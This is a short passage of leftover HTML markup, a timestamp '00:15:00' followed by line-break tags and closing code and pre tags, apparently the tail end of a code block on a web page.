/>00:15:00<br /><br /><br /></code></pre>